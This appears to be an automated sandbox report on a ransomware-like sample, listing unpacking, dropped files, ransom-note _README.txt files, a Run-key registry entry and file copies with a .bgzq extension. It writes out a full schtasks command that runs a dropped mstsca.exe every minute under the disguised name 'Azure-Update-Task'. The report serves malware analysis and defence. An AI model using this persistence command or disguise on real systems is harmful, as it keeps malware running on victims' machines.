Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2284810160.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288349564.000000000343D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2260388125.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2261840679.000000000342D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257701798.0000000003404000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\bat\(= source: mJVVW85CnW.exe, 00000004.00000003.2194309118.000000000313E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209279499.000000000313E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2217637925.000000000313E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\C source: mJVVW85CnW.exe, 00000004.00000003.2294528005.0000000009B49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\INetCookies\bbwe\AppData\pData\ad_prod.pdb\we\G source: mJVVW85CnW.exe, 00000004.00000003.2258660685.0000000009BD3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2249931581.0000000009BDA000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257225377.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248108132.0000000009BCF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2262766102.0000000009BE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vegumizisagezo_curip\liy dapehu.pdb source: mJVVW85CnW.exe, 00000000.00000002.1690106182.0000000000411000.00000002.00000001.01000000.00000003.sdmp, mJVVW85CnW.exe, 00000000.00000000.1684432543.0000000000411000.00000002.00000001.01000000.00000003.sdmp, mJVVW85CnW.exe, 00000001.00000000.1687803475.0000000000411000.00000002.00000001.01000000.00000003.sdmp, mJVVW85CnW.exe, 00000003.00000002.1712093015.0000000000411000.00000002.00000001.01000000.00000003.sdmp, mJVVW85CnW.exe, 00000003.00000000.1706729183.0000000000411000.00000002.00000001.01000000.00000003.sdmp, mJVVW85CnW.exe, 00000004.00000003.1806553429.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000000.1709928301.0000000000411000.00000002.00000001.01000000.00000003.sdmp, mJVVW85CnW.exe, 00000005.00000000.1714586870.0000000000411000.00000002.00000001.01000000.00000007.sdmp, mJVVW85CnW.exe, 00000005.00000002.1720792166.0000000000411000.00000002.00000001.01000000.00000007.sdmp, mJVVW85CnW.exe, 00000006.00000000.1718039159.0000000000411000.00000002.00000001.01000000.00000007.sdmp, mJVVW85CnW.exe, 0000000A.00000000.1825354137.0000000000411000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe\LocalState\ate\on Data\Temp\Symbols\ntkrnlmp.pdb\G source: mJVVW85CnW.exe, 00000004.00000003.2305119902.0000000009C11000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\ source: mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009BCF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\@ source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ate\ source: mJVVW85CnW.exe, 00000004.00000003.2248186822.00000000033CD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\\Pb source: mJVVW85CnW.exe, 00000004.00000003.2179231504.0000000009B04000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1870379356.0000000009AF6000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2195101334.0000000009B00000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178570411.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1941513401.0000000009ADF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1948123921.0000000009AED000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194946115.0000000009AF3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218719984.0000000009B0D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1941657951.0000000009AEA000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errore\AppCache133408904996229952.txtx\7P source: mJVVW85CnW.exe, 00000004.00000003.2179601467.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ta\% source: mJVVW85CnW.exe, 00000004.00000003.2304503353.000000000346F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2303727711.000000000346C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Diagnostics\EXCEL\d.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2317539740.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\bbwe\*y\B source: mJVVW85CnW.exe, 00000004.00000003.2325083218.0000000003199000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2329913318.00000000034FB000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2331014211.00000000034FB000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2327797435.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2327666459.0000000009C3C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\[ source: mJVVW85CnW.exe, 00000004.00000003.2195101334.0000000009B00000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194946115.0000000009AF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\< source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\^ source: mJVVW85CnW.exe, 00000004.00000003.2311578566.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2323070329.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2329007033.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2303995266.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2320258287.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2325524152.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2305579643.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2319564845.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2302675835.00000000033DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\} source: mJVVW85CnW.exe, 00000004.00000003.2262299076.000000000319D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2260099754.000000000319C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258542128.0000000003194000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\Mx source: mJVVW85CnW.exe, 00000004.00000003.2218218924.0000000009AEE000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209724669.0000000009AD8000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194946115.0000000009AD7000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218149624.0000000009AE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\*pw source: mJVVW85CnW.exe, 00000004.00000003.2257225377.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258994911.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2259310801.0000000009BBB000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Unpacked PE file: 1.2.mJVVW85CnW.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Unpacked PE file: 4.2.mJVVW85CnW.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Unpacked PE file: 6.2.mJVVW85CnW.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Unpacked PE file: 11.2.mJVVW85CnW.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Unpacked PE file: 16.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Unpacked PE file: 24.2.mJVVW85CnW.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 26.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 29.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 33.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Unpacked PE file: 1.2.mJVVW85CnW.exe.400000.0.unpack
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Unpacked PE file: 4.2.mJVVW85CnW.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Unpacked PE file: 6.2.mJVVW85CnW.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Unpacked PE file: 11.2.mJVVW85CnW.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Unpacked PE file: 16.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Unpacked PE file: 24.2.mJVVW85CnW.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 26.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 29.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 33.2.mstsca.exe.400000.0.unpack

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 1_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,

1_2_00412220

Source: build3[1].exe.4.dr	Static PE information: section name: .kic
Source: nss3.dll.8.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: msvcp140[1].dll.8.dr	Static PE information: section name: .didat
Source: msvcp140.dll.8.dr	Static PE information: section name: .didat
Source: mozglue.dll.8.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.8.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.8.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.8.dr	Static PE information: section name: .00cfg
Source: sqln[1].dll.8.dr	Static PE information: section name: .00cfg
Source: mstsca.exe.16.dr	Static PE information: section name: .kic

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_004052B5 push ecx; ret	0_2_004052C8
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_0459F0AF push ecx; retf	0_2_0459F0B2
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E58F05 push ecx; ret	0_2_05E58F18
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00428565 push ecx; ret	1_2_00428578
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_0443F0AF push ecx; retf	3_2_0443F0B2
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05E18F05 push ecx; ret	3_2_05E18F18
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D050 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D008 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D028 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D090 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D0A8 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D318 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050C4E0 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D550 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00428565 push ecx; ret	4_2_00428578
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050D698 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050C960 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050C928 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050C988 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050C9A8 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CB78 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CD60 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CDF0 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CE58 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CF28 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CFC0 push eax; retn 004Dh	4_2_0050D6B5
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0050CF90 push eax; retn 004Dh	4_2_0050D6B5

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

System file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html

Jump to behavior

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\wctF86A.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Temp\wct3D66.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Temp\tmp4397.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Temp\wctF86A.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\tmp4397.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\wct3D66.tmp.bgzq (copy)	Jump to dropped file

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	File created: C:\Users\user\_README.txt

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 0_2_00404F7E EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00404F7E

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
